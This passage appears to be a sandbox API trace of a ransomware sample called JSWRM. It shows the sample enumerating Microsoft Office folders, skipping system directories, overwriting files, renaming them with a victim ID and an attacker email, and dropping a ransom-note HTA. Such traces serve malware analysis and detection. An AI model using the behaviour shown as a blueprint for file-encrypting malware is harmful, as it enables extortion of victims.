RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0122.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0122.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0122.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0122.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0122.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0122.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.825] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\AccessWeb\\RPT2HTM4.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accessweb\\rpt2htm4.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\AccessWeb\\RPT2HTM4.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accessweb\\rpt2htm4.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0122.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0122.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0122.826] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x12985c4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x12985c4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x12985c4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e9, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SERVWRAP.ASP", cAlternateFileName="")) returned 1 [0122.826] lstrcmpiW (lpString1="SERVWRAP.ASP", lpString2=".") returned 1 [0122.826] lstrcmpiW (lpString1="SERVWRAP.ASP", lpString2="..") returned 1 [0122.826] lstrcmpiW (lpString1="SERVWRAP.ASP", lpString2="...") returned 1 [0122.826] lstrcmpiW (lpString1="SERVWRAP.ASP", lpString2="windows") returned -1 [0122.826] lstrcmpiW (lpString1="SERVWRAP.ASP", lpString2="recovery") returned 1 [0122.826] lstrcmpiW (lpString1="SERVWRAP.ASP", lpString2="perflogs") returned 1 [0122.826] lstrcmpiW (lpString1="SERVWRAP.ASP", lpString2="documents and settings") returned 1 [0122.826] lstrcmpiW (lpString1="SERVWRAP.ASP", lpString2="$RECYCLE.BIN") returned 1 [0122.826] lstrcmpiW (lpString1="SERVWRAP.ASP", lpString2="system volume information") returned -1 [0122.826] lstrcmpiW (lpString1="SERVWRAP.ASP", lpString2="msocache") returned 1 [0122.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0122.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SERVWRAP.ASP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SERVWRAP.ASP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SERVWRAP.ASP", lpUsedDefaultChar=0x0) returned 12 [0122.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0122.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0122.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SERVWRAP.ASP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SERVWRAP.ASP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SERVWRAP.ASP", lpUsedDefaultChar=0x0) returned 12 [0122.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0122.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0122.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0122.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0122.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\AccessWeb\\SERVWRAP.ASP" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accessweb\\servwrap.asp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.827] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=745) returned 1 [0122.828] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0122.828] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0122.829] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.829] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0122.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0122.830] CloseHandle (hObject=0x238) returned 1 [0122.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0122.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0122.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0122.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0122.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0122.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0122.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.830] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\AccessWeb\\SERVWRAP.ASP" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accessweb\\servwrap.asp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\AccessWeb\\SERVWRAP.ASP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accessweb\\servwrap.asp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0122.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0122.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0122.831] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x12985c4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x12985c4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x12985c4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e9, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SERVWRAP.ASP", cAlternateFileName="")) returned 0 [0122.831] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0122.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0122.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0122.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0122.831] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1295fc19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1306082b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x393a40, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ACCICONS.EXE", cAlternateFileName="")) returned 1 [0122.831] lstrcmpiW (lpString1="ACCICONS.EXE", lpString2=".") returned 1 [0122.831] lstrcmpiW (lpString1="ACCICONS.EXE", lpString2="..") returned 1 [0122.831] lstrcmpiW (lpString1="ACCICONS.EXE", lpString2="...") returned 1 [0122.831] lstrcmpiW (lpString1="ACCICONS.EXE", lpString2="windows") returned -1 [0122.831] lstrcmpiW (lpString1="ACCICONS.EXE", lpString2="recovery") returned -1 [0122.831] lstrcmpiW (lpString1="ACCICONS.EXE", lpString2="perflogs") returned -1 [0122.831] lstrcmpiW (lpString1="ACCICONS.EXE", lpString2="documents and settings") returned -1 [0122.831] lstrcmpiW (lpString1="ACCICONS.EXE", lpString2="$RECYCLE.BIN") returned 1 [0122.831] lstrcmpiW (lpString1="ACCICONS.EXE", lpString2="system volume information") returned -1 [0122.832] lstrcmpiW (lpString1="ACCICONS.EXE", lpString2="msocache") returned -1 [0122.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0122.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCICONS.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCICONS.EXE", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACCICONS.EXE", lpUsedDefaultChar=0x0) returned 12 [0122.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0122.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCICONS.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCICONS.EXE", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACCICONS.EXE", lpUsedDefaultChar=0x0) returned 12 [0122.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0122.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0122.832] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1335b74d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1335b74d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ACCWIZ", cAlternateFileName="")) returned 1 [0122.832] lstrcmpiW (lpString1="ACCWIZ", lpString2=".") returned 1 [0122.832] lstrcmpiW (lpString1="ACCWIZ", lpString2="..") returned 1 [0122.832] lstrcmpiW (lpString1="ACCWIZ", lpString2="...") returned 1 [0122.832] lstrcmpiW (lpString1="ACCWIZ", lpString2="windows") returned -1 [0122.832] lstrcmpiW (lpString1="ACCWIZ", lpString2="recovery") returned -1 [0122.832] lstrcmpiW (lpString1="ACCWIZ", lpString2="perflogs") returned -1 [0122.832] lstrcmpiW (lpString1="ACCWIZ", lpString2="documents and settings") returned -1 [0122.832] lstrcmpiW (lpString1="ACCWIZ", lpString2="$RECYCLE.BIN") returned 1 [0122.832] lstrcmpiW (lpString1="ACCWIZ", lpString2="system volume information") returned -1 [0122.832] lstrcmpiW (lpString1="ACCWIZ", lpString2="msocache") returned -1 [0122.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0122.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0122.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0122.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0122.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b510 [0122.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0122.832] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\jswrm-decrypt.hta")) returned 0xffffffff [0122.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0122.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0122.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0122.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0122.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24e1d8 [0122.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0122.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0122.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b6a0 [0122.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0122.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0122.837] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.837] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0122.838] CloseHandle (hObject=0x45c) returned 1 [0122.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0122.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0122.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0122.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0122.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0122.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0122.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24bce0 [0122.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0122.838] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\jswrm-decrypt.hta")) returned 0x20 [0122.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0122.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0122.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0122.838] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1335b74d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3fe07054, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName=".", cAlternateFileName="")) returned 0x232140 [0122.839] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0122.839] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1335b74d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3fe07054, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="..", cAlternateFileName="")) returned 1 [0122.839] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0122.839] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0122.839] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x12985c4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x12985c4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x12a6aa07, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x606000, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ACWZDAT12.ACCDU", cAlternateFileName="ACWZDA~1.ACC")) returned 1 [0122.839] lstrcmpiW (lpString1="ACWZDAT12.ACCDU", lpString2=".") returned 1 [0122.839] lstrcmpiW (lpString1="ACWZDAT12.ACCDU", lpString2="..") returned 1 [0122.839] lstrcmpiW (lpString1="ACWZDAT12.ACCDU", lpString2="...") returned 1 [0122.839] lstrcmpiW (lpString1="ACWZDAT12.ACCDU", lpString2="windows") returned -1 [0122.839] lstrcmpiW (lpString1="ACWZDAT12.ACCDU", lpString2="recovery") returned -1 [0122.839] lstrcmpiW (lpString1="ACWZDAT12.ACCDU", lpString2="perflogs") returned -1 [0122.839] lstrcmpiW (lpString1="ACWZDAT12.ACCDU", lpString2="documents and settings") returned -1 [0122.839] lstrcmpiW (lpString1="ACWZDAT12.ACCDU", lpString2="$RECYCLE.BIN") returned 1 [0122.839] lstrcmpiW (lpString1="ACWZDAT12.ACCDU", lpString2="system volume information") returned -1 [0122.839] lstrcmpiW (lpString1="ACWZDAT12.ACCDU", lpString2="msocache") returned -1 [0122.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0122.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZDAT12.ACCDU", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZDAT12.ACCDU", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACWZDAT12.ACCDU", lpUsedDefaultChar=0x0) returned 15 [0122.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0122.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0122.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZDAT12.ACCDU", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZDAT12.ACCDU", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACWZDAT12.ACCDU", lpUsedDefaultChar=0x0) returned 15 [0122.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0122.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0122.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0122.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0122.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 